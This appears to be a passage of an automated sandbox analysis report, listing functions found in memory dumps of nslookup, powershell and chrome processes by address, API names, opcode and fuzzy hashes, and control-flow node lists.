                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 6045ad0de31efca1e8ddcb94de0b9ffcd58d6314be4217ecc2448b59dce27053
                            • Instruction ID: 49beb89a20b18df71a33c33b7a3a8e3fc9d9e10673a02e5114614379e008e528
                            • Opcode Fuzzy Hash: 6045ad0de31efca1e8ddcb94de0b9ffcd58d6314be4217ecc2448b59dce27053
                            • Instruction Fuzzy Hash: 71316FB1312B80A5EE27DB57B800BD92398B74DBE4F594525FF190B7A4DF78C4458300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000C41C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 417 14000c41c-14000c457 WriteConsoleW 418 14000c4c3-14000c4d9 417->418 419 14000c459-14000c462 call 14000e018 417->419 419->418 422 14000c464-14000c46f 419->422 423 14000c471 CloseHandle 422->423 424 14000c477-14000c4c1 CreateFileW WriteConsoleW 422->424 423->424 424->418
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: c759f43656eec14f9d398298c1d30b55af2a55c7f1851b28e09130a7d46b6a73
                            • Instruction ID: 923caa0e392d4f45285b0686346bff61248c576a77600dd6e13b5043df0f14dd
                            • Opcode Fuzzy Hash: c759f43656eec14f9d398298c1d30b55af2a55c7f1851b28e09130a7d46b6a73
                            • Instruction Fuzzy Hash: 5C116D72314B8086E752CB57F894799A6A0F78CBE4F044224FB5D877B8CF78C9548740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140004DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 446 140004da0-140004dc4 GetModuleHandleExW 447 140004de5-140004ded 446->447 448 140004dc6-140004ddb GetProcAddress 446->448 450 140004df5-140004dfa 447->450 451 140004def FreeLibrary 447->451 448->447 449 140004ddd-140004ddf call 14000e2b8 448->449 449->447 451->450
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: e1846a0b891334940030055dbf380ec800fe262ad7f1bc0e145d31d485caaf6b
                            • Instruction ID: 8492306c7ed3419d24c313d33fb5f1ef4de63788f1b71c91d435e29b1c35fa9b
                            • Opcode Fuzzy Hash: e1846a0b891334940030055dbf380ec800fe262ad7f1bc0e145d31d485caaf6b
                            • Instruction Fuzzy Hash: 36F0FEF1321A8091FB5ADB62F8943E92364AB4C7D4F44542ABA0B475B5DF78C588D710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000B408 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: 97f949b9dec87a4f783fd330df64fe45643b705181f7f57e1fcccf984a314c0e
                            • Instruction ID: 72f7c70e39e96c1ec9cf5fa7c31995bb42b818f75ad30bfd369313822aa96c95
                            • Opcode Fuzzy Hash: 97f949b9dec87a4f783fd330df64fe45643b705181f7f57e1fcccf984a314c0e
                            • Instruction Fuzzy Hash: 8881CEB2610A5089FB22DB67A8903ED27A1F74CBD8F444216FF0A677B6DB39C445C720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000C738 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 58f5f06950dae238faf5d0a65635edd6898ff1f1bcbae38254af54016aa76da0
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 5011A3F6A7AA4102F6569326F495BED10406B5C7F0F644639BB6F177F78B348C414940
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140003688 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 8656a106d4c9817e8e1a551f2c933fe0b836bd9259f6fbaf6c5506f33ba570a2
                            • Instruction ID: 2d57453f70a64deaa991cab799ba55b0fe103d0fa8c7b0eeb897a7161e11cc0e
                            • Opcode Fuzzy Hash: 8656a106d4c9817e8e1a551f2c933fe0b836bd9259f6fbaf6c5506f33ba570a2
                            • Instruction Fuzzy Hash: 551142F071564186FA67D737B8403E962A96B8CBE0F184624BB690B7F5DA38C841C710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000001400020AC Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ExceptionFilterPresentUnhandled$CaptureConcurrency::cancel_current_taskContextDebuggerEntryFeatureFunctionInitializeLookupProcessorUnwindVirtual__scrt_fastfail_set_fmodestd::bad_alloc::bad_alloc
                            • String ID:
                            • API String ID: 4205775026-0
                            • Opcode ID: 533d34f75a32baddf874858a248d94ed1d3fb4b6976866ecf4ab9dc6987bca5e
                            • Instruction ID: de25f2d7fef365bfdb4106195bb48a80c5a72a0156d31484ec0dca39fbf836f9
                            • Opcode Fuzzy Hash: 533d34f75a32baddf874858a248d94ed1d3fb4b6976866ecf4ab9dc6987bca5e
                            • Instruction Fuzzy Hash: AD21A7F071120646FA3BF7B375663ED02854F9E3D0F5509257B55476F3EE3888828226
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000B1AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: 2de00f3eb9a2df1d326779606cc7aea3deb5c63bcc34c572884cf3809a07f388
                            • Instruction ID: 42d9ef54df0ce910225696aaf683fad4515b6620bbea794134ed71533a3492dd
                            • Opcode Fuzzy Hash: 2de00f3eb9a2df1d326779606cc7aea3deb5c63bcc34c572884cf3809a07f388
                            • Instruction Fuzzy Hash: 7E41AFB2224A8086EB21CF66F8443EA67A1F7987D4F444121FF8D877A8EB38C545C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140006584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 9537ffdc71471a46993a56b90ad88e4790806ac90779a68f31188fd0bc57f76d
                            • Instruction ID: a924dbc47399a7b8f0a94b694f78285d8132746d6c5a34d56f997d11506566a2
                            • Opcode Fuzzy Hash: 9537ffdc71471a46993a56b90ad88e4790806ac90779a68f31188fd0bc57f76d
                            • Instruction Fuzzy Hash: 06110376608B808AD765CB56F48039AB7A5F78DBD0F54412AEFCD93B69CF38C4508B40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140003284 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 67304bbeda1e4893fd74bfa39ee2e51fb734d22883ca12e4281ecac6eee2f54d
                            • Instruction ID: 186de5f2e5a876ebabc5f18cd00dc871777de6ab6166f4505022e890cd56db2e
                            • Opcode Fuzzy Hash: 67304bbeda1e4893fd74bfa39ee2e51fb734d22883ca12e4281ecac6eee2f54d
                            • Instruction Fuzzy Hash: 5811EC72214B8482EB66CF16F54039977A9F788BD4F584225EF8D07B68DF39C555CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140006520 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 6fb513f72de4a0e6f92a5be301ef1a24211b785fed96bc12fabf4b4a9a3b189a
                            • Instruction ID: a70f81bdcbcd8e327696a3e00b8cdc8c0069ed697a1b561a0c49ee8e913cfd4e
                            • Opcode Fuzzy Hash: 6fb513f72de4a0e6f92a5be301ef1a24211b785fed96bc12fabf4b4a9a3b189a
                            • Instruction Fuzzy Hash: 8EF05EB5714B9081E75ADB53F8403D92261AB4CBD0F884025FB8927B69CF38C595C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140006484 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_140000000_nslookup.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 710688037a70124a23ded9f69984700a972f3327b718d02927e74c8fad75db71
                            • Instruction ID: 51f3dfcc75cb7eca721987b756c51f7bac595818b9d6fe49fead209c2d1115cc
                            • Opcode Fuzzy Hash: 710688037a70124a23ded9f69984700a972f3327b718d02927e74c8fad75db71
                            • Instruction Fuzzy Hash: 93E092F1205A40C1FA4BDB63F8003E82262AB4C7C0F984122FB491B3B5CE38C889C300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 00007FFF7E3E5D70 Relevance: .1, Instructions: 103COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000019.00000002.470261290.00007FFF7E3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_25_2_7fff7e3e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 518222056c3bfe6647ce0c96ecc70bba6ae8b5e66f3e11b7b6f93efab05aac99
                            • Instruction ID: e0f2e28885d947bfe8c02bd145855d3f619c08fb9f6519ad497ae4a5107f5ce9
                            • Opcode Fuzzy Hash: 518222056c3bfe6647ce0c96ecc70bba6ae8b5e66f3e11b7b6f93efab05aac99
                            • Instruction Fuzzy Hash: A631EF31918A4D9FDF98DF18C495EEDBBE1FF68300F54016AE449D3255CA35E881CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3E2363 Relevance: .1, Instructions: 65COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000019.00000002.470261290.00007FFF7E3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_25_2_7fff7e3e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2c64acb5c6da7bcff6271394c8446b5d7a98c189f76eb30a71bbe5a62a5b1023
                            • Instruction ID: 92545fb763721031c43f5dd99fd3d9eda82b86d1bcb9b00cf89b10c88cd04251
                            • Opcode Fuzzy Hash: 2c64acb5c6da7bcff6271394c8446b5d7a98c189f76eb30a71bbe5a62a5b1023
                            • Instruction Fuzzy Hash: F211BA31A1890D8FDF85EF58C495EEDB7E1FF68310F14016AE40AE7292CE25E881CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3E10D0 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000019.00000002.470261290.00007FFF7E3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_25_2_7fff7e3e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7623cc1ce90a398d5b135984ee4d1fc802661151ac6617b43199657e270a9c6e
                            • Instruction ID: ff60849d02a70e4fe9cbccb8f0549d81ea0160106a995cfe7ea01c1bf5246013
                            • Opcode Fuzzy Hash: 7623cc1ce90a398d5b135984ee4d1fc802661151ac6617b43199657e270a9c6e
                            • Instruction Fuzzy Hash: E3112B3251CB488BC754EB18D4519ABB7E1FBD8314F400A2FF48AE7255DE25EA458BC2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3E597D Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000019.00000002.470261290.00007FFF7E3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_25_2_7fff7e3e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 032ee4aa54fcea494df3a922e10ab961ea5b547e9a8b7f601f947b9f939c525a
                            • Instruction ID: 452a8c214fefb99e231dbb293132b0cc67ff954b10464b04977b4d6001ca4a0e
                            • Opcode Fuzzy Hash: 032ee4aa54fcea494df3a922e10ab961ea5b547e9a8b7f601f947b9f939c525a
                            • Instruction Fuzzy Hash: 9B110D31A18B088FDB94EF58D4D5AEDB7F1FB58321F10416EE54AD7252DB31A842CB41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3E3DE5 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000019.00000002.470261290.00007FFF7E3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_25_2_7fff7e3e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 680210260d297ddd6cce1913b2059f6c17375dc271560bd4e777092d97f47648
                            • Instruction ID: 30867852edcf425cfc795e86ec11fab458805c06eb9998e73d6df81d44eb77a8
                            • Opcode Fuzzy Hash: 680210260d297ddd6cce1913b2059f6c17375dc271560bd4e777092d97f47648
                            • Instruction Fuzzy Hash: 5701677111CB0C4FD748EF0CE451AAAB7E0FB95324F10056EE58AC3651DA36E892CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3E4890 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000019.00000002.470261290.00007FFF7E3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_25_2_7fff7e3e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 55e291e62552701667458ea5398f2a4bd156d2191899b7ef04ec6e82071dbbb7
                            • Instruction ID: 630e3e8f45ef03d18f7fba94a8a68d3f4817070db2a9b318c84adb8832d5e466
                            • Opcode Fuzzy Hash: 55e291e62552701667458ea5398f2a4bd156d2191899b7ef04ec6e82071dbbb7
                            • Instruction Fuzzy Hash: 3CF0903171DA080BE70C6B2CB8464FD77D1EB85320B4440BFE44AC6297EC27AC8346C6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3E43BE Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000019.00000002.470261290.00007FFF7E3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_25_2_7fff7e3e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e95261f27c70069d9c14d31a7765a9a3128ca2ea8b4442f0a392f6bd05b2afa3
                            • Instruction ID: 9fbaf9a68be350cb4dfa7cc5cc29e8c3c14e88f705b59f5fc5481e399da75820
                            • Opcode Fuzzy Hash: e95261f27c70069d9c14d31a7765a9a3128ca2ea8b4442f0a392f6bd05b2afa3
                            • Instruction Fuzzy Hash: 06F05B3176C6054FDB9CAA1CE44157573D1E799311B10007EF48BC2696D927E843C745
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3E43D0 Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000019.00000002.470261290.00007FFF7E3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_25_2_7fff7e3e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 69302a8eb4077700b97b94fb6ff71897a0879acecc3a09039f1a64f56c7f6995
                            • Instruction ID: 5b4b72158c5b7852df7746803fe81ea2ecb0d940749691520e96616fc0c4581e
                            • Opcode Fuzzy Hash: 69302a8eb4077700b97b94fb6ff71897a0879acecc3a09039f1a64f56c7f6995
                            • Instruction Fuzzy Hash: 51F0373275C6044FDB4CAA1CE88297973D1E799324B40016EE48BC2697DD17E8438645
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 00007FFF7E3F1CCC Relevance: .1, Instructions: 120COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da9d6fcbb1a37ca8252af4463805dfb2e8bd55acadbebf373a3faca4876cbd73
                            • Instruction ID: 972ba733ae1f09f61615105fddfbb8ce29edd782fe27007be04aefd156214c53
                            • Opcode Fuzzy Hash: da9d6fcbb1a37ca8252af4463805dfb2e8bd55acadbebf373a3faca4876cbd73
                            • Instruction Fuzzy Hash: 2C31292160D7890FD71B9A3488155A2BFE5EB87210B1582EFE0D6CB5A7DD289807C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F1C9B Relevance: .1, Instructions: 116COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a6a7e60148b69404478d88d44b186bd85997c89ddc27844d5da8359a6b3df49
                            • Instruction ID: f8f483b6308fc34c4e6d88d6e8827f9fdd3ac7a4dfac0ff4040af66095223f81
                            • Opcode Fuzzy Hash: 2a6a7e60148b69404478d88d44b186bd85997c89ddc27844d5da8359a6b3df49
                            • Instruction Fuzzy Hash: AF31382250D7C80FD31F9A348C255627FA6DBC7210B1A82EFE4C6CB1A7D8285C07C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F1D60 Relevance: .1, Instructions: 93COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 016c45f44d3f4328755a7679d7fc604a14ecc4e7ff13d9ad342c46670562395a
                            • Instruction ID: 98c380d4cd5eefa7f0db6d035764c73860e536a4db1cd4b6b7348c8f4bf2b7c2
                            • Opcode Fuzzy Hash: 016c45f44d3f4328755a7679d7fc604a14ecc4e7ff13d9ad342c46670562395a
                            • Instruction Fuzzy Hash: 9E210B2260D2C41FD75F96388C29462BFAADBC711071A82EFE0C6CB5E3DD685807C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F6B7B Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID: py-~
                            • API String ID: 0-2261527179
                            • Opcode ID: 7f38103cfc77cb119253316d66ca0fea6db442fba036544d7e460d4b13e94cd6
                            • Instruction ID: cf007997fa0a77e73ae4c10c12778ec4dcb83da61f8727e5d8e122e0cad684da
                            • Opcode Fuzzy Hash: 7f38103cfc77cb119253316d66ca0fea6db442fba036544d7e460d4b13e94cd6
                            • Instruction Fuzzy Hash: B2F0F03271841A0BE78CFA6C842A2FD66C6EB85300B50023BE40BD73D7DC2C98120385
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F117C Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID: `W-~
                            • API String ID: 0-3825604350
                            • Opcode ID: db2a9dc40ef2fcf5fe8c4f533a8c1b16486fa2a5813d847d1c1c366c70ff3ce1
                            • Instruction ID: 802cf6131d18d33502f33dc526aa21031eb180cb7454be7f244fd9a306964ef3
                            • Opcode Fuzzy Hash: db2a9dc40ef2fcf5fe8c4f533a8c1b16486fa2a5813d847d1c1c366c70ff3ce1
                            • Instruction Fuzzy Hash: 79D0A902716A0D4B9AD0AA3C81886E993C0EF9A212380027B918BC2283DD18A44B0280
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F4FC7 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID: 5__^
                            • API String ID: 0-411768125
                            • Opcode ID: 1b4d92cd849ba7b4bd41e55832e49858648abda82719d1d28c946d0f6cf4526e
                            • Instruction ID: 693820f8965f0ce25671118821be740fa6834f38d8faa288ea554c356b640c13
                            • Opcode Fuzzy Hash: 1b4d92cd849ba7b4bd41e55832e49858648abda82719d1d28c946d0f6cf4526e
                            • Instruction Fuzzy Hash: 61C09B1753D5496FE2C1E7FC45E9A64BED1AB16250700007AF506DA583ED1CF4444E55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F4ED2 Relevance: 1.3, Strings: 1, Instructions: 7COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID: #6__^
                            • API String ID: 0-3398070538
                            • Opcode ID: 57fc2bcadf9bd8b957d80fd1d0d402035e12004a011d3544b9b0f1d7f463748b
                            • Instruction ID: 605cf0dec78f0d052e458476aacca5570f1adbe1d506ab95dcba96a7107932a0
                            • Opcode Fuzzy Hash: 57fc2bcadf9bd8b957d80fd1d0d402035e12004a011d3544b9b0f1d7f463748b
                            • Instruction Fuzzy Hash: B9B0124393C54A2AA2C9B7AC05387749CC1FE57160B04007BE41FDB3C7EC0CC4451A43
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F00BF Relevance: .1, Instructions: 136COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a72d9d8782697067fe48d4a4ba8bd1e12770ef04f0ea2e868d5076f49aba76c
                            • Instruction ID: 5a97374851caaf22db0b6d9f4990edcf004da29588221ee66b312061befee50d
                            • Opcode Fuzzy Hash: 3a72d9d8782697067fe48d4a4ba8bd1e12770ef04f0ea2e868d5076f49aba76c
                            • Instruction Fuzzy Hash: 2441AF3BB041168AE704EF6DF8855EDB7E0EFC0335B00453BD185CE252DE2AA59B8B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F007F Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c8d7e36510c15b5209070ca0995cf6a646ab228de0cabc7d3399e3f2bd336915
                            • Instruction ID: 5102c1113f4649e50d536e1b14344c44edc8cfe06819dd80dd2b1c1e3b3f5d34
                            • Opcode Fuzzy Hash: c8d7e36510c15b5209070ca0995cf6a646ab228de0cabc7d3399e3f2bd336915
                            • Instruction Fuzzy Hash: 4941CF3BB041168AE700EF6DE8855EDB7E0EFC0335B004537D185CE252DE2AA59B8B95
                            Uniqueness

                            Uniqueness Score: -1.00%

